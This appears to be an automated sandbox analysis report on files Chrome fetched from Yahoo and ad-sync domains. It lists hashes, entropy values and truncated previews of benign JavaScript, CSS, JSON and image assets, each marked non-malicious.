                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://onetag-sys.com/usync/?pubId=5d49f482552c9b6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Sync Pixels</title>.</head>.<body>..<script>.. var syncPixels = "";. var syncIframes = "";.. var GDPR_APPLIES = "gdpr=";. var GDPR = "gdpr_consent=";. var US_PRIVACY = "us_privacy=";... var params = location.search.substring(1);. var consentString = "";. var usPrivacy = "";. var gdprAppliesValue = "1";.. try {.. var index = params.indexOf(GDPR);. if (index >= 0) {. consentString = params.substring(index + GDPR.length).split("&")[0];. }.. index = params.indexOf(GDPR_APPLIES);. if (index >= 0) {. var tmp = params.substring(index + GDPR_APPLIES.length).split("&")[0];. gdprAppliesValue = (tmp == null || tmp === "" || tmp === "1") ? "1" : "0";. }.. index = params.indexOf(US_PRIVACY);. if (index >= 0) {. usPrivacy = params.substring(index + US_PRIVACY.length).split("&")[0];. }..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4698)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.321959729043066
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:OWVgpFipyb6c0SZ/iNSrZOFU01Yf8DR+Q4kMeJgxrWHG59LH+49ZYcl6j:OWGpA4b6eiNSrZOFU01Yf8d+QhMc0rb+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:31DD01F9604A6543D7B6BCF905852312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:48B6FC523734BE1A526CC7F535B73E2FA77BDABF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2BDDAD7177FB15C05B678CF123F02C3374CC39615866C692C2AEC81F63A26513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C8D90CA1D7A4439EF314E042487B16146E5F6B3D56FB42CA129BA5EFA9799FD4C6A8E302AF5FF356A988FFB81E553E66B694F27B64B68AC2A771DF956DF6D7DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var Q=Object.defineProperty;var T=(t,e,n)=>e in t?Q(t,e,{enumerable:!0,configurable:!0,writable:!0,value:n}):t[e]=n;var I=(t,e,n)=>(T(t,typeof e!="symbol"?e+"":e,n),n);import{n as w,ae as W,i as G,af as X,v as E,a1 as O,R as j,ag as Y,a2 as N,ah as U,f as Z,ai as tt,aj as et,ak as nt,al as it,am as V,an as st,ao as rt,ap as at,aq as ft,ar as ot}from"./scheduler.Dsuh-FKt.js";const H=typeof window<"u";let q=H?()=>window.performance.now():()=>Date.now(),B=H?t=>requestAnimationFrame(t):w;const k=new Set;function J(t){k.forEach(e=>{e.c(t)||(k.delete(e),e.f())}),k.size!==0&&B(J)}function D(t){let e;return k.size===0&&B(J),{promise:new Promise(n=>{k.add(e={c:t,f:n})}),abort(){k.delete(e)}}}const M=new Map;let P=0;function ut(t){let e=5381,n=t.length;for(;n--;)e=(e<<5)-e^t.charCodeAt(n);return e>>>0}function lt(t,e){const n={stylesheet:X(e),rules:{}};return M.set(t,n),n}function z(t,e,n,s,u,a,l,i=0){const c=16.666/s;let r=`{.`;for(let $=0;$<=1;$+=c){const m=e+(n-e)*a($);r+=$*100+`%{${l(m,1-m)}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):37262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.969885744250928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:fSKeg6B8wwBC8ycGS6K3Lw+7zGHgFavbM+4q:fXegdwwBCQ1R3lJFavbMA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:45B6CA94A78E3793A8AC5356F752BA14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5F021D3E4ABF04FED13942F574BC2147E131C5FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EA307790220EE0DA26CA31AD4F856F468A260DB9596E5301DA2A0E27F92A3DCF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7C77B743E93A6084D28578EFE2D76C73AEB7C51BB9A75E7127D7942F13DAE8B8383064A714B92600913A5C147D4B06FC06E5F72A2CF8889B839E971C00D6A3A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C......................................................................................................................K..........................!1.."AQa.2q..B...#Rb....3r.....$S....%4C56Dds................................../.......................!1.....A."#Q23Ba$Cq.4.............?.......{6/.aoQ..!...+.......JNRMn...$..dA..i..k\:...[..T..e8..d.!l..R....U....IY.$'...Y3.E..lu#g.+..4.x...D.F...T.DnFQ....@.2.R.......R[C.#}.Q....-...:..H....8.%I.=+....3.D......b.4............m....j5.J.M.HVCC..Y....V.#.ji.=.P0E..^....2.5VBD.pF(.C..)...R..J%...X.W..J2..$.....7i.=h...0....["...(X_........E.O.dU.. r.'.R.d.z.'......p.?.....e[.<.P..Z. ..1ML......xj.5[...tK.....BFh,..@.y...N6j.J.[.....2%.5..".....Y#h..R.\.0......Ow.. w.$..Z.....9..U.6A.g.8.a"F.(u.........Rd.u.8.5.]..L...ga ....(...j.....s.(.@2..6.3Z1...#... ...l.u..r+LI`..S/.N..F...-5GA;,0JI...VvX.).5E.Nk........)........./.Z..>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8986)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.452805036573083
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:SEBXFCJ6EIoA1R8RnQU0fIBIAdWo2WPcHSj7AdxHwz5iPA:la6EAR8Rn90w+ArP0mCxG1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:290EA37CB82747C5F692439F5E191BAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F2C4814530DE65C81252392AB404BDAF3B6C857B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EE4016EEEA8C075D1B82B3CA53E2FE6BF0A75151ABDBED658207338DB379DF0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:00AB3AE10D7E88B77F0313F7E35D86666545251FDAF0B8E6C00CC491CA99FF2C57523F96487CBCD819D2DC2F167D2012E32199E9DF4245998689B3F1E7A54B6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/EnhancedPill.eT1hwQep.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Z,e as P,d as M,f as N,i as p,q as D,L as X,k as T,I as ne,c as le,b as F,j as V,l as C,u as oe,g as ie,a as se,Q as ae,t as R,h as q,a7 as re,a1 as fe,m as ce,o as ue,n as G}from"./scheduler.Dsuh-FKt.js";import{S as J,i as K,t as E,g as W,a as v,e as Y,c as H,b as U,m as j,d as z}from"./index.CvwOawEI.js";import{B as Q}from"./Button.C2rixdaC.js";import{C as de}from"./close.C3ug6nNR.js";import{t as L,d as me,h as _e,c as he,Z as x,g as ge,e as be,an as pe}from"./commonUtil.BWwawKjd.js";import Ee from"./ErrorMsg.Cn69Klh6.js";import{S as ve}from"./Spinner.D9ew0_W4.js";import{l as $,f as ke}from"./logUtil.CCV3qKPL.js";import{l as Ce,u as De}from"./updatePortfolioChartStore.DhAdR_DV.js";import{l as Le}from"./loadPortfolios.CP0EWCgJ.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.n39zXuiY.js";function ee(l){let e,n,t;const o=l[13].default,i=le(o,l,l[12],null),r=i||Oe();let s=l[2]&&te(l);return{c(){e=P("section"),r&&r.c(),n=F(),s&&s.c(),this.h()},l(f){e=M(f,"SECTI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2261)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.480446598921567
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:htV9uMnE45v2mRAfZ1nWBy+m6LlzCULVHKBmgFp1WeQvBjV2YClAQ:rV93E45em2fZ1nWBy+miLlKBmgNZgIY8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:699223BDCD27FFC2918AF08B5FDEDE19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EC1663B13DE19827BEBA91244AA7ADB10994776D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1A75186E0C2E4F9ECB3CA78DDC176C09DE34C60756BDDFB28CDB4D8D06362826
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4E7DDAFEC2ABF56476188E88F04AA0A1939DF3C3FB06F4EB62092E8A65C47367BFB14E9BE8907BE7AB718B63B55B3B31BE2AD116D4FB8A19B3D3DB0A19352432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as V,e as h,t as b,b as S,d as y,f as d,h as I,i as E,j as k,q as O,L,k as q,l as u,m as U,n as N}from"./scheduler.Dsuh-FKt.js";import{S as B,i as C}from"./index.CvwOawEI.js";import{t as T,b as M}from"./commonUtil.BWwawKjd.js";function H(l){let e,i=T(l[1]===1?"DELETE_POSITION_SUBTEXT_ONE":"DELETE_POSITION_SUBTEXT_OTHER",{ns:"common",symbol:l[0],count:l[1],price:l[4]})+"",a;return{c(){e=h("p"),a=b(i),this.h()},l(n){e=y(n,"P",{class:!0});var c=d(e);a=I(c,i),c.forEach(E),this.h()},h(){O(e,"class","description yf-t1mb2n")},m(n,c){q(n,e,c),u(e,a)},p(n,c){c&19&&i!==(i=T(n[1]===1?"DELETE_POSITION_SUBTEXT_ONE":"DELETE_POSITION_SUBTEXT_OTHER",{ns:"common",symbol:n[0],count:n[1],price:n[4]})+"")&&U(a,i)},d(n){n&&E(e)}}}function X(l){let e,i,a=T("DELETE_POSITION_TITLE",{ns:"common",symbol:l[0]})+"",n,c,f,r,_=T("DELETE_POSITION_SUBTEXT2")+"",m,s=!l[2]&&H(l);return{c(){e=h("div"),i=h("h2"),n=b(a),c=S(),s&&s.c(),f=S(),r=h("p"),m=b(_),this.h()},l(t){e=y(t,"DIV",{class:!0});var o=d(e);i=y(o,"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.423645601696178
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:/ZG/ue3I/yNy/QO/wZo/K3y/VS/hKP/4S/9ClvNp/CaI26N:/AYbrHeywcH8HI1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9FAF9F0AF03805FD10E24FD7A54CA611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:08040307BA428BDE6AE12DA50273BA339F681AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F26B4A53465EBC250CF44D422A38CBE2D812476AEA4E9215485C16B888273EE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FF7FA984E9B3C6397D0C258ADC6AD74229B7E72C80E25230220A197941F1B90E517C11145DACB3FEB0B89B3A49BDBE74EE7190DC7B123458A323693B8F5E267F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://www.yahoo.com/manifest_desktop_us.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "background_color": "#ffffff",. "display": "standalone",. "gcm_user_visible_only": true,. "icons": [. {. "sizes": "48x48",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_48.png",. "type": "image/png". },. {. "sizes": "72x72",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_72.png",. "type": "image/png". },. {. "sizes": "96x96",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_96.png",. "type": "image/png". },. {. "sizes": "128x128",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_128.png",. "type": "image/png". },. {. "sizes": "144x144",. "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_144.png",. "type": "image/png". },. {.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65354)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):98590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.262081609860911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:l6uJO46KoxxmzxgwyPtXjgypu5DUWCsHEGh363pz1ndumnf:KrxhPSyp0R63pR7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:93C71F7FAF9DCA7767823C99109C81D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:01E7B25914D48BB4DD3CD2E6F60CFCD99CAA10EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:66776998B10E583A72F8FD29391A50E2C80EB3BC9A65B0DAFE97E576D7D88507
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3E02E2F714D1FB066FFD376FACFD936E75D01D6862D4F7FC353B1D0E725FE3294BBAAE85268DB46541AC7B55D44AC8721A685113FA0D8FD617B323D6DE768B7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:// Hash: ioxxdjHDzFBt50jsKHcULoEjfPjn7FupHUObUXTEulH1iImcaT1OYYq4nXedv+v6ystL/mciw43eN2N1sBqukEcB1G3yLaozwAQoZarIvpe+op2I8dDWCrnmQL5aA3TRFA2hIGMEsGDPdljIfZlxPKB5Tt8rZMkwd8T+7UEJODk=.!function(e){"use strict";var n=function(e,t){return(n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var i in t)t.hasOwnProperty(i)&&(e[i]=t[i])})(e,t)};function t(e,t){function i(){this.constructor=e}n(e,t),e.prototype=null===t?Object.create(t):(i.prototype=t.prototype,new i)}var L=function(){return(L=Object.assign||function(e){for(var t,i=1,n=arguments.length;i<n;i++)for(var r in t=arguments[i])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function i(e,t){var i={};for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&t.indexOf(n)<0&&(i[n]=e[n]);if(null!=e&&"function"==typeof Object.getOwnPropertySymbols){var r=0;for(n=Object.getOwnPropertySymbols(e);r<n.length;r++)t.indexOf(n[r])<0&&Object.prototype.pro
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (589)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):590
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.934608603853675
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:di46Gej1VWmZjTJ4GSKOvOgoIXCKkREp8IROSEnKIR/RSYQHIRkcxDXYXYzRFMf7:YGexV33J4V1lzTp8+DsrK9cxLYjfo1En
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F99C3862781B9E7A4EF7E403A6C9B220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:53E5094A293B691361F046E81BA2148AC217A3B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EA838382143075E48253946B6B191244E9A6C7C983AB4E7012089172D6D00C32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:78D9D31B5DAF296C12D428D1FC86B6FFD2184E5B308556BB27DE055B1EEF25528CBB1702950C51E3F3EE8E7411529119094408B2F0935626D859CFFBB4B10CDE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/StatusTag.CEoB-Y-F.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:div.yf-p6px5b{display:inline-flex;justify-content:center;align-items:center;border-radius:var(--border-radius-s);font-weight:var(--font-medium);font-size:var(--font-m);color:var(--white);padding:.125rem .375rem;line-height:1.25}div.bullish.yf-p6px5b{background-color:var(--positive)}div.bearish.yf-p6px5b{background-color:var(--negative)}div.neutral.yf-p6px5b{background-color:var(--neutral)}div.empty.yf-p6px5b{padding:.125rem 0;color:var(--secondary);background-color:var(--ui-gray-200)}div.filled.yf-p6px5b{background-color:var(--enabled-l2)}div.caps.yf-p6px5b{text-transform:uppercase}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (419)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.646165904554131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:BC69mc4sl3O4b1/3mjGVuNM3r2Gi2i4gc13UXc7Rig8PhCR0V+v4v:061Pb1ej2Fr2iLgS3OIARE4v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B2A9502704DCBABFBA520502814A7F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:653E95FEF2F6F4A50F0AC9F254F65A5FEFC2F7D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3305A6BA0F384325F4050D2E0042DAD3F96498116955274B4E1A633640336B6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1035B0C6FFD0F5AA3E07E14C9B4FAA3874A6FF2BFC5104CD6F54A4BD79BF3D5E7727A1C486CACE2628E1261C59A856BFC702D1223081569FDA3C6A0771B7ACAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const h='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.39 11 16 12.61V11zM17 7h-4v1.9h4c1.71 0 3.1 1.39 3.1 3.1 0 1.27-.77 2.37-1.87 2.84l1.4 1.4A4.99 4.99 0 0 0 22 12c0-2.76-2.24-5-5-5M2 4.27l3.11 3.11A4.99 4.99 0 0 0 2 12c0 2.76 2.24 5 5 5h4v-1.9H7c-1.71 0-3.1-1.39-3.1-3.1 0-1.59 1.21-2.9 2.76-3.07L8.73 11H8v2h2.73L13 15.27V17h1.73l4.01 4.01 1.41-1.41L3.41 2.86z"/></svg>';export{h as U};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 340x179, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15450
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.957388029314052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:o2xgDcRh3/eCvWnkNDHWWIcF1h/1OIqBS0DyQZP6E:975WQWa3h/1ObBS7AyE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:520AAEAE8AB00C1CF03EB5639B52D057
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ADE3D5F8B9B80FDA656CCE47521ED05FA7A5C19D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:99E637C5DBFBAB4690718FD304E208B3754CE580739C0C9FC1710E019BBDB6D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6024A930FE2532419E07074404718A1C0CF565325466711B887F92C7D5D5CD276B617A11F922214DA2D310F3B96CFC2A830711A90A3AE6FA891EBA95D2A4CCEE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T........T.."..........5..................................................................d.. ....{..Y\.;.W.k{|..>$<.u.D.j>..N.O..U.Yo.....m....V..D/..+.&....-..X...............9...*Z.c~.X..Kj@.'..6.D...9WR......:^...(.@..GQ..K.%..y[..7.5.J5..ti.|4.....s.....$....2...%.n^U..k..|..g.:|.l....V......P..;a...3.=7V.......=P'a+...y1v.I]y;%.<.M.48*Zp.9J.^....f../..X....,. c8.&..&..E.5...;l.7B` .U.k....X.n.M...f....v...x.'..B.k...W.Br........n..D........j......;..N..n..%.a+k'O..%#.38.&2..y.r.J..M.kl.(n...z..z}...2..QCo.m....`;.|....B.R..y)...p4]..Yo...9m..N....A.n.#.n.L.~...:..K..?....E{.u..C.7. ..d.....}..........z[..-.........9.R.e.c..]..k....D(..E.v....O..o.N.....\.,p......y..n.........&...[<Y....... ..j.......>.g. r..H.d+.......LI........\.-k.)8[>...I..V.Zy.|..5...-.....|'..V.t1...@.&.....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15735)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3538214812563885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:tjhokNAcq1IwoHp/AnzM9jD+3EQjXkrLMwH3Fom2xZ9T7zRar:NyIwW/AnzKDMEQTkrLMS3FxM9T7zRar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:46EC7CD52EE9F5C1236B0DEA5072690A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CF9337DE42260986BA6EC460E64AB5120A3E5445
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96398EA031F2FABAC614F2A0719722AC6D4C531AFBC38D48C86DABD17D4D2D7F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:84C8EA4CF4AEC794FAB79D1251396671D336CB275AF068C773B5F7A0BF40A867F58E1713DA8155E3CE5EB661F9FA65F6D7B1A2C47D4441798292BA2D1D4CA526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var e=window.wafer,t=e.base||{};function n(n,o){if(e)return o=o||{},e.utils.elementInView(n,o,t.viewport)}function o(e,t,n,o,i){return{clean:t,dest:n,h:i,metaSize:!0,pos:e,supports:!1,w:o}}var i={context:{bucket:"",bucketId:"",device:"",intl:"",lang:"",meta:{},mode:"normal",region:"",rid:"",site:""},i13n:{}},a=["MAST","LDRB"],s=function(){var e,t,s,r,l,c=window,d=document,f=c.adsConfig,u=c.YAHOO,v=void 0===u?i:u,p=c.DARLA,m=void 0===p?null:p,h=c.wafer,g={},b="adRotateEvt",w="scroll",E="homepage-viewer",C="sda-",L=C+"LREC4",A=C+"MON2",y="native-leaderboard-ad",x="gemini-ad-refresh",R=!1;function O(){var o;if(f&&(t=f.rotation)&&(null===(o=null==f?void 0:f.positions)||void 0===o?void 0:o[t.currentpos]))if(f.clientPositionMeta.positions.forEach((function(e){g[e.id]=e})),r=g[t.currentpos],m)if(t.enableNavAdRotation&&h.on("fetch:success",(function(e){e.elem.classList.contains("nextgen-page-navigation")&&function(e){var t=c._darlaAutoEvt;t||(t=m.evtSettings("AUTO")||{
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (27104)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.361148094990428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:af8/g/Nl1s/stRfo0B2FwyNxdYKriRzCsvFvCuQ:afUoNlM0fYrDuCuQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C4F8F606E8D26E30B45D83965E4C0905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F791F5B936EAC352D7F483A12450E6B9DD064772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:27A7C1F2F2C7018314D78B422F71E0EDA4F6904F261E36D93956F65E308D82EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:11F3BB13686F77E0D40829826CC45A1E456978FFFCB0677FA16F1E1AE9C2A1558A2048FF376D9B486B5263D8572367FF2031F9A07F3DCAB152A69FF15D98EAC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://eus.rubiconproject.com/usync.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var comments = 'User-Sync: generated: 2024-09-25 20:33:51 PDT';.var rtb_sync = {"consent_rate":100,"reset_rate":0,"ttl":14,"sample":100,"max_pixels":16,"pixel_sets":{"rtb":{"sample":100,"pixels":{"1185":{"ttl":7,"img":"https:\/\/ad.turn.com\/r\/cs?pid=6","secure":{"img":"https:\/\/ad.turn.com\/r\/cs?pid=6"},"priority":7,"partner":"amobee"},"1902":{"priority":17,"ttl":2,"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0","secure":{"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0"},"partner":"quantcast"},"1986":{"priority":7,"ttl":1,"img":"https:\/\/ib.adnxs.com\/getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30","secure":{"img":"https:\/\/secure.adnxs.com\/getuidnb?https%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30"},"partner":"xandr"},"2046":{"priority":13,"ttl":7,"img":"https:\/\/token.rubiconproject.com\/token?pid=2046&pt=n&a=1",
